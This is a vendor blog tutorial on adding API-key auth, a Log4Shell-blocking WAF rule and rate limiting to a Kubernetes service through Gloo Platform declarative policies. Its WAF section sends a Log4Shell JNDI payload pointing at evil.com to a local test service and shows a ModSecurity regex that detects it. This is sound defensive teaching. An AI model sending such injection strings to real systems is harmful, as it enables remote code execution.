Cloud migration meets its mesh, Part 2: Exploring declarative security

At Solo.io, we enjoy working with enterprises at various stages of their cloud journey. As a tech startup, in the early days we often collaborated with early adopters in the space – organizations who were moving rapidly up the cloud native experience curve. In many cases, their entire organization was “cloud native,” in that their entire infrastructure suite was born in the cloud.

Now as foundational technologies like containers and Kubernetes orchestration have crossed the chasm, Solo works more frequently with enterprises who are not so far along in their cloud journey. These are often large enterprises who have enjoyed business success for many years, and their IT infrastructures reflect that legacy.

In discussing the current and future capabilities of service mesh technology, we often hear questions like this:

“How can a service mesh like Istio help me along my cloud migration journey?”

In Part 1 of this series, we explored how a service mesh can assist with the earlier stages of the migration process, sometimes involving the lift-and-shift of existing VM-based deployments. We used a simple example to demonstrate how to use Gloo Platform to facilitate cloud migration from an externally deployed service to one managed within a Kubernetes cluster and an Istio-based service mesh.

But Lift-and-Shift is typically just the first step on a cloud migration journey. Most applications have opportunities to Move-and-Improve. A common area where enterprises want to improve their services as part of cloud migration is externalizing authorization code from the underlying applications into declarative policies. Gloo Platform offers a Swiss-army knife of external authNZ features to enable this transition.

In this Part 2 of the series, we will build from our previous example and add three separate security measures at the gateway.

  • API Key Security;
  • Web Application Firewall (WAF); and
  • Rate Limiting.

We’ll do this in a declarative fashion, without modifying even one line of code or configuration in the underlying application service.

Exercise prerequisites

We encourage you to work through the steps in Part 1 of this series in order to install Gloo Platform, to establish a Workspace and Virtual Gateway, to build and test routes to the un-migrated external service, to create the migrated service inside a Kubernetes cluster, and finally to manage the migration from the old to the new service. Once you’ve completed that exercise, then you should be ready to begin this one.

However, if you’d like to explore just the external security mechanisms in this installment of the series, we’ve provided a simple script in the “Starting from scratch” section below to establish a single local k3d cluster, install Gloo Platform, and establish the configuration necessary to begin this exercise.

First, let’s a confirm a few other requirements if you’d like to follow along in your own environment. You’ll need a Kubernetes cluster and associated tools, plus an installation of Gloo Platform. We ran the tests in this blog on Gloo Platform v2.3.4 with Istio v1.17.2. We hosted all of this on a local instance of k3d v5.4.3.

You’ll need a license key to install Gloo Mesh Enterprise if you don’t already have one. You can obtain a key by initiating a free trial here.

For this exercise, we’ll also use some common CLI utilities like kubectl, curl, and git. Make sure these prerequisites are all available to you before jumping into the next section. I tested all of this on MacOS but other platforms should be perfectly fine as well.

Starting from scratch

NOTE that you can skip this section if you already have an environment where you’ve completed Part 1 of this exercise.

If you haven’t already, you’ll need local access to the resources required for this exercise. They are available in the gloo-gateway-use-cases repo on GitHub. Clone that to your workstation and switch to the gloo-gateway-use-cases example directory. We’ll primarily be using the resources in the cloud-migration-pt2-security example.

git clone https://github.com/solo-io/gloo-gateway-use-cases.git
cd gloo-gateway-use-cases

As this is a getting-started example with Gloo Platform, you’ll only need a single k8s cluster active. However, if you already have multiple clusters in place, you can certainly use that configuration as well.

If you don’t have Gloo Platform installed, there is a simplified installation script available in the GitHub repo you cloned in the previous section. Before you execute that script, you’ll need three pieces of information.

  1. Place a Gloo license key in the environment variable GLOO_GATEWAY_LICENSE_KEY. If you don’t already have one of these, you can obtain it from your Solo account executive.
  2. Supply a reference to the repo where the hardened Solo images for Istio live. This value belongs in the environment variable ISTIO_REPO. You can obtain the proper value from this location once you’re a Gloo Mesh customer or have activated a free trial.
  3. Supply a version string for Gloo Mesh Gateway in the environment variable GLOO_MESH_VERSION. For the tests we are running here, we use v2.3.4.

Now from the gloo-gateway-use-cases directory at the top level of the cloned repo, execute the setup script below. It will configure a local k3d cluster containing Gloo Platform, an underlying Istio deployment, and the configuration necessary to begin this exercise. The script will fail if any of the three environment variables above is not present.

./cloud-migration-pt2-security/setup-prereq.sh

The output from the setup script should resemble what you see below. If you require a more complex installation, a more complete Gloo Platform installation guide is available here.

*******************************************
Updating Gloo Platform Helm charts...
*******************************************
"gloo-platform" already exists with the same configuration, skipping
Hang tight while we grab the latest from your chart repositories...
...Successfully got an update from the "gloo-platform" chart repository
Update Complete. ⎈Happy Helming!⎈
*******************************************
Establishing local k3d cluster...
*******************************************
INFO[0000] Using config file setup/k3d/gloo.yaml (k3d.io/v1alpha4#simple)
INFO[0000] portmapping '8080:80' targets the loadbalancer: defaulting to [servers:*:proxy agents:*:proxy]
INFO[0000] portmapping '8443:443' targets the loadbalancer: defaulting to [servers:*:proxy agents:*:proxy]
INFO[0000] Prep: Network
INFO[0000] Created network 'k3d-gloo'
INFO[0000] Created image volume k3d-gloo-images
INFO[0000] Starting new tools node...
INFO[0000] Starting Node 'k3d-gloo-tools'
INFO[0001] Creating node 'k3d-gloo-server-0'
INFO[0001] Creating LoadBalancer 'k3d-gloo-serverlb'
INFO[0001] Using the k3d-tools node to gather environment information
INFO[0001] Starting new tools node...
INFO[0001] Starting Node 'k3d-gloo-tools'
INFO[0002] Starting cluster 'gloo'
INFO[0002] Starting servers...
INFO[0002] Starting Node 'k3d-gloo-server-0'
INFO[0007] All agents already running.
INFO[0007] Starting helpers...
INFO[0007] Starting Node 'k3d-gloo-serverlb'
INFO[0014] Injecting records for hostAliases (incl. host.k3d.internal) and for 3 network members into CoreDNS configmap...
INFO[0016] Cluster 'gloo' created successfully!
INFO[0016] You can now use it like this:
kubectl config use-context k3d-gloo
kubectl cluster-info
*******************************************
Waiting to complete k3d cluster config...
*******************************************
Context "k3d-gloo" renamed to "gloo".
*******************************************
Installing Gloo Gateway...
*******************************************
Attempting to download meshctl version v2.3.4
Downloading meshctl-darwin-amd64...
Download complete!, validating checksum...
Checksum valid.
meshctl was successfully installed 🎉

Add the Gloo Mesh CLI to your path with:
  export PATH=$HOME/.gloo-mesh/bin:$PATH

Now run:
  meshctl install     # install Gloo Mesh management plane
Please see visit the Gloo Mesh website for more info:  https://www.solo.io/products/gloo-mesh/
 INFO  💻 Installing Gloo Platform components in the management cluster
 SUCCESS  Finished downloading chart.
 SUCCESS  Finished installing chart 'gloo-platform-crds' as release gloo-mesh:gloo-platform-crds
 SUCCESS  Finished downloading chart.
 SUCCESS  Finished installing chart 'gloo-platform' as release gloo-mesh:gloo-platform
workspace.admin.gloo.solo.io "gloo" deleted
workspacesettings.admin.gloo.solo.io "default" deleted
*******************************************
Waiting to complete Gloo Gateway config...
*******************************************
<snip...>
*******************************************
Rolling out httpbin deployment...
*******************************************
namespace/httpbin created
serviceaccount/httpbin created
service/httpbin created
deployment.apps/httpbin created
Waiting for httpbin deployment to complete...
Waiting for deployment "httpbin" rollout to finish: 0 out of 1 new replicas have been updated...
Waiting for deployment "httpbin" rollout to finish: 0 of 1 updated replicas are available...
deployment "httpbin" successfully rolled out
*******************************************
Establishing Gloo Platform workspace
namespace/ops-team created
workspace.admin.gloo.solo.io/ops-team created
workspacesettings.admin.gloo.solo.io/ops-team created
*******************************************
Establishing Gloo Platform virtual gateway
virtualgateway.networking.gloo.solo.io/north-south-gw created
*******************************************
Establishing Gloo Platform route table
routetable.networking.gloo.solo.io/httpbin created

Verify your configuration

Whether you’ve worked through Part 1 of this exercise, or used the shortcut script in the previous section, you’ll definitely want to confirm that you’re ready for the meat of this exercise.

Let’s do that in two steps, using Gloo Platform’s meshctl CLI and then running a sample invocation against our application service.

Verification #1 with meshctl

The meshctl command provides a number of useful utilities when working with Gloo Platform. We will use it to confirm that our installation has no outstanding issues.

meshctl check --kubecontext gloo

You should see a lot of GREEN in the response:

🟢 License status

 INFO  gloo-mesh enterprise license expiration is 08 Mar 24 10:04 EST
 INFO  Valid GraphQL license module found

🟢 CRD version check


🟢 Gloo Platform deployment status

Namespace        | Name                           | Ready | Status
gloo-mesh        | gloo-mesh-redis                | 1/1   | Healthy
gloo-mesh        | gloo-mesh-agent                | 1/1   | Healthy
gloo-mesh        | gloo-telemetry-gateway         | 1/1   | Healthy
gloo-mesh        | gloo-mesh-mgmt-server          | 1/1   | Healthy
gloo-mesh        | gloo-mesh-ui                   | 1/1   | Healthy
gloo-mesh        | prometheus-server              | 1/1   | Healthy
gloo-mesh-addons | redis                          | 1/1   | Healthy
gloo-mesh-addons | ext-auth-service               | 1/1   | Healthy
gloo-mesh-addons | rate-limiter                   | 1/1   | Healthy
gloo-mesh        | gloo-telemetry-collector-agent | 1/1   | Healthy

🟢 Mgmt server connectivity to workload agents

Cluster | Registered | Connected Pod
gloo    | true       | gloo-mesh/gloo-mesh-mgmt-server-6c58598fcd-6x5n4

Verification #2 with curl

Now run this curl command to confirm that our httpbin service instance is available through the gateway.

curl -X GET http://localhost:8080/get -i

You should see a successful 200 OK response similar to this:

HTTP/1.1 200 OK
server: istio-envoy
date: Mon, 05 Jun 2023 16:37:11 GMT
content-type: application/json
content-length: 669
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 17

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
    "X-B3-Parentspanid": "ec12336f690367fb",
    "X-B3-Sampled": "0",
    "X-B3-Spanid": "7009f02f7385ef68",
    "X-B3-Traceid": "ac73cc61c8997719ec12336f690367fb",
    "X-Envoy-Attempt-Count": "1",
    "X-Envoy-Internal": "true",
    "X-Forwarded-Client-Cert": "By=spiffe://gloo/ns/httpbin/sa/httpbin;Hash=4fba21eb38f611c4194c68f0804b9cc737363d35f243f98f6c3b280e9286784c;Subject=\"\";URI=spiffe://gloo/ns/gloo-mesh-gateways/sa/istio-ingressgateway-1-17-2-service-account"
  },
  "origin": "10.42.0.1",
  "url": "http://localhost:8080/get"
}

3 Declarative security examples

Note that while the verification command succeeded, we have no security at all around this endpoint that we’re exposing through our gateway. As we Move-and-Improve this service in our Kubernetes environment, we’d like to secure it without changing the underlying application. Gloo Platform will allow us to do that in a declarative fashion. We’ll supply K8s Custom Resources that Gloo will translate into Envoy configuration that will be applied at the ingress point of our application network. No application changes required!

Declarative security #1: API keys

API keys are a popular mechanism for securing the ingress point of an application service. While there are many security mechanisms supported in the Gloo portfolio, API keys are a popular choice because they are both simple and effective.

We’ll accomplish this in our example using four simple steps:

  • Establish some keys.
  • Establish a reference to the Gloo external auth service.
  • Establish an API key policy.
  • Attach that policy to one or more routes.

Establish an API key secret

We begin by creating an API key using just the string admin and storing it in a Kubernetes Secret. Note in particular the label we attached to this key with attribute name api-keyset and value httpbin-users. We will later create a policy that will select all keys with these labels.

apiVersion: v1
kind: Secret
metadata:
  name: solo-admin
  namespace: ops-team
  labels:
    api-keyset: httpbin-users
type: extauth.solo.io/apikey
data:
  api-key: YWRtaW4=  # this is "admin" in base64

Ensuring that you’re still in the gloo-gateway-use-cases directory, issue the following command to apply the Secret:

kubectl apply -f cloud-migration-pt2-security/01-apikey-secrets.yaml --context gloo

You should see a response like this:

secret/solo-admin created

Establish a link to the Gloo external auth service

Gloo Platform provides a variety of authentication options to meet the needs of your environment. They range from supporting basic use cases to complex and fine grained secure access control. Architecturally, Gloo Gateway uses a dedicated auth server to verify the user credentials and determine their permissions. Gloo Platform provides an auth server that can support several authNZ implementations and also allows you to provide your auth server to implement custom logic.

While some authentication solutions, such as JWT verification, can occur directly in Envoy, many use cases are better served by an external service. Envoy supports an external auth filter, where it reaches out to another service to authenticate and authorize a request, as a general solution for handling a large number of auth use cases at scale. Gloo Edge Enterprise comes with an external auth (ExtAuth) server that has built-in support for all standard authentication and authorization use cases, and a plugin framework for customization.

The graphic below can help provide context on how and when external authentication is evaluated when a request is received by Gloo Gateway and processed by Envoy relative to other security features.

Gloo Edge Envoy processing stack

For this exercise, all we need to do is establish an ExtAuthServer reference to the ext-auth-service instance that is already deployed in our environment. We will only need to establish this once in order to support all ExtAuth security mechanisms.

apiVersion: admin.gloo.solo.io/v2
kind: ExtAuthServer
metadata:
  name: default-server
  namespace: ops-team
spec:
  destinationServer:
    port:
      number: 8083
    ref:
      cluster: gloo
      name: ext-auth-service
      namespace: gloo-mesh-addons

Build the ExtAuthServer reference using this command:

kubectl apply -f cloud-migration-pt2-security/02-extauth-server.yaml --context gloo

Expect this response:

extauthserver.admin.gloo.solo.io/default-server created

Establish an API key policy

Note that the ExtAuthPolicy provided below brings together a number of important factors for establishing this API key mechanism:

  1. The server stanza points to the ExtAuthServer instance established in the previous step.
  2. The apiKeyAuth stanza selects all Secrets with the api-keyset attribute and a value of httpbin-users. This selects the admin secret we established earlier.
  3. The applyToRoutes stanza applies this policy to all routes with the label route: httpbin. We will modify our route to include this label in the next step.
apiVersion: security.policy.gloo.solo.io/v2
kind: ExtAuthPolicy
metadata:
  name: httpbin-apikey
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: httpbin
  config:
    server:
      name: default-server
      namespace: ops-team
      cluster: gloo
    glooAuth:
      configs:
      - apiKeyAuth:
          headerName: x-api-key
          labelSelector:
            api-keyset: httpbin-users

Establish the ExtAuthPolicy:

kubectl apply -f cloud-migration-pt2-security/03-extauth-policy.yaml --context gloo

Expect a response like this:

extauthpolicy.security.policy.gloo.solo.io/httpbin-apikey created

Attach that policy to our route

Given that we established our policy with a route selector for any route with the label route: httpbin, we need to make a simple modification to our RouteTable to add that label.

apiVersion: networking.gloo.solo.io/v2
kind: RouteTable
metadata:
  name: httpbin
  namespace: ops-team
spec:
  hosts:
    - '*'
  virtualGateways:
    - name: north-south-gw
      namespace: ops-team
      cluster: gloo
  workloadSelectors: []
  http:
    - name: httpbin-in-mesh
      labels:
        route: httpbin  # Add this label to ensure it picks up our ExtAuthPolicy
      forwardTo:
        destinations:
          - ref:
              name: httpbin
              namespace: httpbin
              cluster: gloo
            port:
              number: 8000

Apply the RouteTable tweak with this command:

kubectl apply -f cloud-migration-pt2-security/04-rt-httpbin-label.yaml --context gloo

Expect this response:

routetable.networking.gloo.solo.io/httpbin configured

Confirm the policy is applied to the route

Would you like to confirm that the API key policy has been successfully applied to the route? You can do that by simply checking the status of the RouteTable, or by inspecting the Gloo Platform UI. Let’s investigate the UI option here.

If you don’t have access to the UI already, you can use port-forwarding of the gloo-mesh-ui service to activate it at http://localhost:8090.

kubectl port-forward -n gloo-mesh svc/gloo-mesh-ui 8090:8090 --context gloo &

Then point your browser at http://localhost:8090 and navigate through Gateways to the httpbin Route. You can expect to see an interface like this, with the applied policy httpbin-apikey linked. Click through the link to see more details about the policy.

Test API key security

Let’s test out our new policy with three use cases:

  • Test the original invocation with no API key header.
  • Test with an invalid API key header.
  • Test with a valid API key header.

First, now that the API key policy has been applied to our route, we expect the original invocation to fail since it provides no credentials. We are not disappointed:

curl -X GET http://localhost:8080/get -i

And the response shows a 401 Unauthorized response.

HTTP/1.1 401 Unauthorized
www-authenticate: API key is missing or invalid
date: Fri, 02 Jun 2023 21:19:36 GMT
server: istio-envoy
content-length: 0

Second, if we add an invalid API key — say, developer instead of admin — we expect that to similarly fail. Again, our declarative policy is enforced just as expected.

curl -X GET -H "x-api-key: developer" http://localhost:8080/get -i

Here’s the expected failure result:

HTTP/1.1 401 Unauthorized
www-authenticate: API key is missing or invalid
date: Fri, 02 Jun 2023 21:20:25 GMT
server: istio-envoy
content-length: 0

Third and finally, if we supply an acceptable API key, then we get a valid response from the endpoint.

curl -X GET -H "x-api-key: admin" http://localhost:8080/get -i

Here’s the abridged response.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:19:25 GMT
content-type: application/json
content-length: 696
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 3

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
    "X-Api-Key": "admin",
... snip ...

Declarative security #2: Web Application Firewall

Solo engineers have blogged and spoken extensively about the Log4Shell attack that set the Internet “on fire” in December 2021. Check out this blog for a more detailed description of this zero-day vulnerability that ravaged a number of high-profile enterprises who depend on the ubiquitous Log4J logging framework.

For zero-day vulnerabilities as pernicious as Log4Shell, having an arsenal of responses that can be deployed quickly, without changes to upstream applications, and across multiple services simultaneously, is a vital requirement.

One such weapon is a Web Application Firewall, or WAF. WAF depends on time-tested ModSecurity rules. And Gloo Platform makes it available at the gateway level. You can learn more about Solo’s WAF support both in product documentation and conference talks.

Test with a common Log4Shell attack vector

Log4Shell attacks operate by passing in a Log4J expression that causes a lookup to a remote server, like a JNDI identity service. The malicious expression might look something like this: ${jndi:ldap://evil.com/x}. It might be passed in to the service via a header, a request argument, or a request payload. What the attacker is counting on is that the vulnerable system will log that string using Log4j without checking it. That’s what triggers the destructive JNDI lookup and the ultimate execution of malicious code.

We’ll simulate one of these attack vectors by passing our evil.com string in a request header to our gateway, and then see that request routed to the target service.

We’ll use curl to simulate the attack, passing in the attack string as the value of the standard User-Agent header:

curl -X GET -H "x-api-key: admin" -H "User-Agent: \${jndi:ldap://evil.com/x}" http://localhost:8080/get -i

You can expect a response like the one below. Note in particular this entry in the headers response: "User-Agent": "${jndi:ldap://evil.com/x}". If httpbin were logging this header using Log4J, then we would have a real problem on our hands.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:25:34 GMT
content-type: application/json
content-length: 710
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 3

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "${jndi:ldap://evil.com/x}",
... snip ...

Apply a WAF policy

Consider a simple ModSecurity rule that we’ll package into our gateway, which can block one of the more common Log4Shell attack vectors.

apiVersion: security.policy.gloo.solo.io/v2
kind: WAFPolicy
metadata:
  name: log4jshell
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: httpbin
  config:
    disableCoreRuleSet: true
    customInterventionMessage: 'Log4Shell malicious payload'
    customRuleSets:
    - ruleStr: |-
        SecRuleEngine On
        SecRequestBodyAccess On
        SecRule ARGS|REQUEST_BODY|REQUEST_HEADERS
          "@rx \${jndi:(?:ldaps?|iiop|dns|rmi)://"
          "id:1000,phase:2,deny,status:403,log,msg:'Potential Remote Command Execution: Log4j CVE-2021-44228'"

Let’s examine what this policy does. Line 1 of the ModSec rule identifies request variables we want to match, entities like the REQUEST_BODY and REQUEST_HEADERS. These are entities where the contents might be logged by Log4J when the request is received, so we want to be sure to protect them. A full ModSec variable list is available here and a complete reference manual is here.

Line 2 is the condition that is applied to the variables listed in Line 1. In this case, we’re matching against strings that begin with ${jndi.

Finally, Line 3 defines the action to be taken when the rule is matched. In this case, we are denying the request and passing back an HTTP 403 Forbidden error code.

We’ll apply this rule using the WAFPolicy API of Gloo Platform. Note from the policy YAML before that we have configured this rule to apply to any routes that have the label route set to a httpbin value. Take a look at the httpbin RouteTable we established in a previous step, which already has this label in place.

This highlights one of the core strengths of Gloo Gateway, the ability to apply sophisticated policies once and have them automatically applied to multiple backend services, with no changes to the target services. This is not only true of WAF policies, but also complex authNZ and transformation policies too. Just add a label to the RouteTables of the services you need to protect from Log4Shell, and you have both instant and consistent protection across all those services. See our partner Snyk’s post about normalizing authorization policies that span a variety of backend services. OutSystems has also written about its use of Solo gateway technology to achieve similar results in a complex, multi-tenant environment.

Now let’s apply our new WAFPolicy now and attach it to our httpbin route.

kubectl apply -f cloud-migration-pt2-security/05-waf-log4shell.yaml --context gloo

Expect to see this result:

wafpolicy.security.policy.gloo.solo.io/log4jshell created

Did WAF block the Log4Shell attack?

We’ll use curl again to simulate the same attack we used before with the unprotected service. Recall that the service fulfilled the request with no problems, which would have created a problem had the backend service been vulnerable to Log4Shell.

curl -X GET -H "x-api-key: admin" -H "User-Agent: \${jndi:ldap://evil.com/x}" http://localhost:8080/get -i

But observe the difference with our WAF protection in place. The malicious request is now rejected with a 403 Forbidden error.

HTTP/1.1 403 Forbidden
content-length: 27
content-type: text/plain
date: Fri, 02 Jun 2023 21:27:10 GMT
server: istio-envoy

Log4Shell malicious payload

So that’s good news. But what happens if we provide a valid User-Agent header that doesn’t trigger our ModSec rule?

curl -X GET -H "x-api-key: admin" -H "User-Agent: curl/7.87.0" http://localhost:8080/get -i

The request is successful just as expected.

HTTP/1.1 200 OK
server: istio-envoy
date: Fri, 02 Jun 2023 21:27:26 GMT
content-type: application/json
content-length: 696
access-control-allow-origin: *
access-control-allow-credentials: true
x-envoy-upstream-service-time: 2

{
  "args": {},
  "headers": {
    "Accept": "*/*",
    "Host": "localhost:8080",
    "User-Agent": "curl/7.87.0",
... snip ...

So by using a simple declarative rule deployed within our gateway — and without the delay of modifying applications or the overhead of an extra hop to an outside WAF service — we’re able to respond to a pervasive zero-day vulnerability.

Declarative security #3: Rate limiting

One common problem that leads to a rate limiting requirement is the Distributed Denial of Service attack, or DDoS. We need to protect our services from DDoS, but we don’t want to modify individual applications in order to achieve that? What if we could specify an external rate limiting policy in a declarative fashion, and apply it across multiple services at the ingress point of our application networks?

Let’s first examine the YAML for a simple set of rate limiting constraints with Gloo Platform. In this case, let’s assume that 3 requests per minute is the threshold at which we want to start throttling requests. To implement that, we define four separate components.

Define request characteristics with a RateLimitClientConfig

A RateLimitClientConfig defines the characteristics of different request “buckets” where we want to apply a limit. We only require simple configuration here. More complexity is required if supporting something like a Quality-of-Service use case, say allowing 10 requests per minute for premium Gold customers, but only 2 requests for others. In that instance, our client config would define additional attributes to consider. But in this case we just need to define a simple counter. You can find more sophisticated examples in the Gloo Platform documentation.

apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitClientConfig
metadata:
  name: rate-limit-client-config
  namespace: ops-team
spec:
  raw:
    rateLimits:
    - actions:
      - genericKey:
          descriptorValue: counter

Define rate-limit tracking characteristics with a RateLimitServerConfig

A RateLimitServerConfig defines the enforcement parameters of the rate-limiting constraint. In our case, there is a specific limit of 3 requests per minute, which will be applied to each request on the route. There is also a pointer to the rate-limiter server, part of the Gloo Platform deployment, which we’ll declare in the next step.

apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerConfig
metadata:
  name: rate-limit-server-config
  namespace: ops-team
spec:
  destinationServers:
  - ref:
      name: rate-limiter
      namespace: gloo-mesh-addons
    port:
      name: grpc
  raw:
    descriptors:
    - key: generic_key
      rateLimit:
        requestsPerUnit: 3
        unit: MINUTE
      value: counter

Declare the rate limit server location with RateLimitServerSettings

Gloo Platform establishes a separate rate limiting server deployed along with its gateway. We need to define a one-time setting to specify its location.

apiVersion: admin.gloo.solo.io/v2
kind: RateLimitServerSettings
metadata:
  annotations:
    cluster.solo.io/cluster: ""
  name: rate-limit-server-settings
  namespace: ops-team
spec:
  destinationServer:
    port:
      number: 8083
    ref:
      cluster: gloo
      name: rate-limiter
      namespace: gloo-mesh-addons

Bind these configs together with a RateLimitPolicy

A RateLimitPolicy object ties the components defined in the previous steps together into a single policy, and also declares the routes to which it will be applied. In this case, we’ll use the same label selector route: httpbin that we used for the API key and WAF examples. This will bind the policy to our httpbin route.

apiVersion: trafficcontrol.policy.gloo.solo.io/v2
kind: RateLimitPolicy
metadata:
  name: rate-limit-policy
  namespace: ops-team
spec:
  applyToRoutes:
  - route:
      labels:
        route: "httpbin"
  config:
    serverSettings:
      name: rate-limit-server-settings
      namespace: ops-team
    ratelimitClientConfig:
      name: rate-limit-client-config
      namespace: ops-team
    ratelimitServerConfig:
      name: rate-limit-server-config
      namespace: ops-team

Now apply the RateLimitPolicy from your command shell:

kubectl apply -f cloud-migration-pt2-security/06-rate-limit-policy.yaml --context gloo

Expect this result:

ratelimitclientconfig.trafficcontrol.policy.gloo.solo.io/rate-limit-client-config created
ratelimitserverconfig.admin.gloo.solo.io/rate-limit-server-config created
ratelimitserversettings.admin.gloo.solo.io/rate-limit-server-settings created
ratelimitpolicy.trafficcontrol.policy.gloo.solo.io/rate-limit-policy created

Test rate limiting

We’ll use a simple bash script to test our 3-requests-per-minute rate limiting policy. If we simulate a DDoS attack by issuing 6 requests in succession, then the first 3 should succeed, but the last 3 should fail.

Let’s try that now, showing only the HTTP response code from the curl commands.

for i in {1..6}; do; curl -X GET -H "x-api-key: admin" -s -o /dev/null -w "%{http_code}\n" http://localhost:8080/get ; done

As long as all 6 requests fall within the same one-minute window, then you can expect a response like this:

200
200
200
429
429
429

The first 3 requests received successful HTTP 200 OK responses. But the final 3 were rejected by the Envoy gateway with a 429 Too Many Requests rate-limited code.

Congratulations! If you made it to this point in the exercise, then you’ve established API key security, a Web Application Firewall, and rate limiting protection on your application network using strictly declarative configuration, with zero application changes. Nice Job!

Exercise cleanup

If you used the single-cluster k3d cluster we set up earlier to establish your Gloo Platform environment for this exercise, then there is an easy way to tear down this environment as well. Just run this command:

./setup/teardown.sh

Going beyond the basics: Next steps to explore

Thank you for taking this introductory cloud migration security tour with us. There are dozens of different avenues you might want to explore from this point. Here are a few ideas:

  • This example deployed our new service in a simple, single-cluster environment. Explore the richness of multi-cluster routing with automated failover from the Gloo Platform documentation here.
  • Our scenario assumed a single application team. Real-world enterprises need a service mesh that supports the division of responsibilities across platform teams and multiple application teams. Gloo Platform’s multi-tenancy features make this much easier.
  • We’ve discussed securing basic REST endpoints with Gloo Platform in this exercise. But Solo technology makes it easier to support more complex APIs in a simple, declarative way as well. For example, GraphQL is an open-source API mechanism growing rapidly in popularity. Gloo Platform allows you to support even non-GraphQL services using GraphQL APIs, and without a separate server instance as required by many alternative architectures. Learn more about Solo’s revolutionary approach to GraphQL here.

Learn more

In this blog post, we demonstrated how to use Gloo Platform to facilitate adding declarative security as part of a cloud migration process using an Istio service mesh.

All resources used to build the example in this post are available on GitHub.

Do you want to explore further how Solo and Gloo Platform can help you migrate your workloads to the cloud with best practices for traffic management, zero trust networking, and observability?